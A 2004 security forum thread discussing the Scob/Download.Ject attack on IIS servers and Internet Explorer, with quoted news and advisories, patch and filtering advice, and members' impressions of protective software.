A New Era of Internet Threats

Discussion in 'malware problems & news' started by ronjor, Aug 6, 2004.

Thread Status:
Not open for further replies.
  1. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,791
    Location:
    Texas
    In the earlier age of virus attacks, computer users had to interact with the infection vehicle in order to activate the virus. While those old techniques relied on the ignorance of end-users, in today's world the end-user doesn't have to do anything wrong. The Scob attacks of this past June give a hint of what's to come.

    Internet security firms are gearing up for an onslaught of new attacks that hackers will hurl at inboxes and Web sites.

    As the computer industry awaits the release of Service Pack 2 of Microsoft's Windows XP -- which will feature improved security capabilities -- hackers are waiting too. They have spent the last 12 months mastering mobile attack techniques and an arsenal of devastating weapons that might make Windows XP SP2 even more vulnerable than the old Windows 98.

    ecommercetimes
     
  2. Devinco

    Devinco Registered Member

    Joined:
    Jul 2, 2004
    Posts:
    2,524
    Thanks Ronjor,

    Good article.
    Is there anywhere I can learn more about these SSL vulnerabilites and how to protect against them?
    It explained a little bit here, but could Proxomitron be set up to do something similar?
     
  3. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,791
    Location:
    Texas
    Good questions Devinco.

    I slapped SurfinGuard Pro on my machine to see what it offered. I have it set in the high mode.
    Anyone out there use this app?
     

    Attached Files:

  4. Devinco

    Devinco Registered Member

    Joined:
    Jul 2, 2004
    Posts:
    2,524
    Ronjor,

    I just found a helpful post by Paranoid2000 on The dangers of HTTPS. It also answers the question about Proxomitron: yes it can filter HTTPS with a special plugin.

    The SurfinGuard Pro looks interesting, kind of like a combo of SSM and Proxomitron? But I wonder, since it is external to the browser, is it able to see into the encrypted HTTPS?
     
  5. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,791
    Location:
    Texas
  6. Devinco

    Devinco Registered Member

    Joined:
    Jul 2, 2004
    Posts:
    2,524
    Thanks for the link Ronjor.

    Nice tests. I saw no real difference between the SSL and non-SSL tests in practice though. The exploits that work in SSL work just as well non-SSL.
    I tried them all with both FF 0.92 (will upgrade soon) and IE6.
    This was with no Proxomitron or other prefiltering.
    FF fared better even with tight IE settings.
    The scrap object demo was pretty sneaky, but I was alerted by both Wormguard and Word.
    One interesting thing is that IE allows you to disable downloads (thwarting the direct download test) while FF does not.
     
  7. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,791
    Location:
    Texas
    Devinco

    The program seems tailored to IE. I tried IE with different settings and this program stops access to several sites with the setting on high.
     
  8. Primrose

    Primrose Registered Member

    Joined:
    Sep 21, 2002
    Posts:
    2,743
    On the article..

    Itzy Sabo from Finjan Software is trying to sell you a bill of goods with these comments and the scare tactics Jack M. Germain entertwined in his article with some of these statements.


    "The Scob worm is the first attack in which hackers use a mix of mobile application techniques -- including VBScript, JavaScript and ActiveX -- to create a blended Web-based attack that can manifest across standard Web protocols like HTTP.

    The attack is based on the execution of a series of mobile code scripts that infect Web servers and spread by way of users who visit those servers. Visitors to the Web site unknowingly download the Scob virus and thus participate in the propagation.
    This is a very complex attack that none of the traditional security products were easily able to detect and combat. The virus operated as a VBScript utility, which targeted Microsoft IIS servers and appends a malicious JavaScript to Web pages in the compromised Web server"

    And then the solution they both present..

    In fact it is all lazy webmaster who did not take advantage of the fix on their side which was availble 3 months prior..and then users who did not have their system locked down using IE>



    Microsoft Security Bulletin MS04-025
    http://www.microsoft.com/technet/security/bulletin/MS04-025.mspx


    On June 24, 2004, a flaw in Microsoft IIS servers led to compromised webservers that redirected visitors to a malicious website hosted in Russia. That site exploited additional flaws in Internet Explorer to force downloads of Trojans onto the hijacked visitor's system. The malware residing on the impacted IIS servers was dubbed Download.Ject, JS.Scob.Trojan, JS.Toofeer, and the Scob Trojan depending on the antivirus vendor.

    The Trojan downloaded after visitors were redirected to the Russian website has been identified as BackDoor-AXJ.dll by antivirus vendor Network Associates and Padodor.W by antivirus vendor F-Secure. According to Network Associates, the Trojan provides remote access to the infected system, creates a web proxy, and can automatically download other malicious files. According to F-Secure, the Trojan is used to steal passwords and credit card numbers from infected systems.

    Microsoft released a patch for the IIS vulnerabilities in April 2004. The patch, MS04-011, would have prevented the webservers from being penetrated. Without it, the attackers were able to append exploit code to various files on the webserver. That code then forced users to another site exploiting MS04-013, a flaw that has routinely been used to deliver Trojans via email links that lead to booby-trapped websites. (See Scam emails deliver Trojaned goods). A second, as yet unpatched, flaw in Internet Explorer was also exploited in the Scob attacks.

    Though the Scob attacks received widespread media attention, they were quite short-lived. The Russian site dishing up the Trojan was shutdown on the same date - June 24, 2004 - the attacks began. However, similar attacks via email remain quite prevalent. The websites used in those attacks vary. Similar to a phishing scam, the miscreant email attempts to lure the user into visiting a particular site. Unlike a phishing scam, however, instead of soliciting financial details, the site surreptitiously infects the visitor's system with Trojans used for remote-access, keylogging, or downloading further malicious files.


    Research analysis firm Gartner says although Internet-based code attack, called Scob or Tropher, that exploits unpatched security flaws in Microsoft's Internet Explorer has been dealt with, "copycat" attacks are highly likely, according to a recent report posted on the company's website.

    The firm has recommended users make more investments to protect themselves against virus attacks and give themselves more time to patch and update their systems.

    Referring to the latest Scob attack, the firm said "many enterprises have already implemented technologies for Web filtering and content monitoring that can help protect against such attacks."

    Scob is a three-stage attack: The user visits a website that has either been defaced with malicious code or established to infect systems; a malicious script on the site is executed, infecting the user's PC and downloading exploit code; finally, the code on the infected system sends information to an external site.

    The original sites hosting Scob have been shut down, but "copycat" attacks - including spam and phishing attacks - are highly likely, it says.

    Web and content filters can help with such attacks, but they remain reactive and often require that blacklists be developed after a malicious site is detected. "Proactive detection and filtering of potentially malicious code offers a better defence against Scob-type attacks, as well as other spyware and malware threats," says the research. Gartner also recommends filtering vendors expand these capabilities in their products as soon as possible.

    Also, it advises users to:




    Use installed Web filtering applications to block known infected sites and sources of malicious code.

    Block scripting code at the gateway until Microsoft releases a patch for the Internet Explorer flaws.

    Filter Internet Traffic to Stop 'Scob Copycat' Attacks

    http://www4.gartner.com/DisplayDocument?doc_cd=121672



    Harden Your Windows Servers Against Internet Explorer Flaw


    http://www4.gartner.com/DisplayDocument?doc_cd=121587

    Qwik-Fix™ provides another layer of essential security

    http://www.qwik-fix.net/



    c't-IEController 2.0
    http://www.heise.de/ct/ftp/projekte/iecontroller/

    'Zero-Day' Internet Explorer Flaw Detected

    http://www.eeye.com/html/research/alerts/AL20040610.html


    Prevention:
    Disable Active Scripting, except for trusted web sites. Alternative browsers such as Mozilla, Opera or Netscape are not subject to this attack.

    Additionally, as a public service to the network security community, eEye Digital Security has developed utilities to assist with the remediation of the flaws these attacks are leveraging. To download these tools please visit:

    http://www.eeye.com/html/research/tools/IESecurityRegFixer.zip

    Update: These issues have now been updated by Microsoft and a patch is available.


    So who has active scripting enabled ??
     
  9. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,791
    Location:
    Texas
    Good points. I use Firefox anyway. :D

    I have to admit, he is a good salesman.
     
  10. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    57,791
    Location:
    Texas
    Okay. I took SurfinGuard Pro off my XP machine. Not without a fight though. I got some error about java injection blah, blah. So I reinstalled and tried to deinstall. Got another error. Since I make a restore point before I install programs, I banished this program to the basement of history! :D

    Do not install this program is my best advice. :mad:
     
Loading...
Thread Status:
Not open for further replies.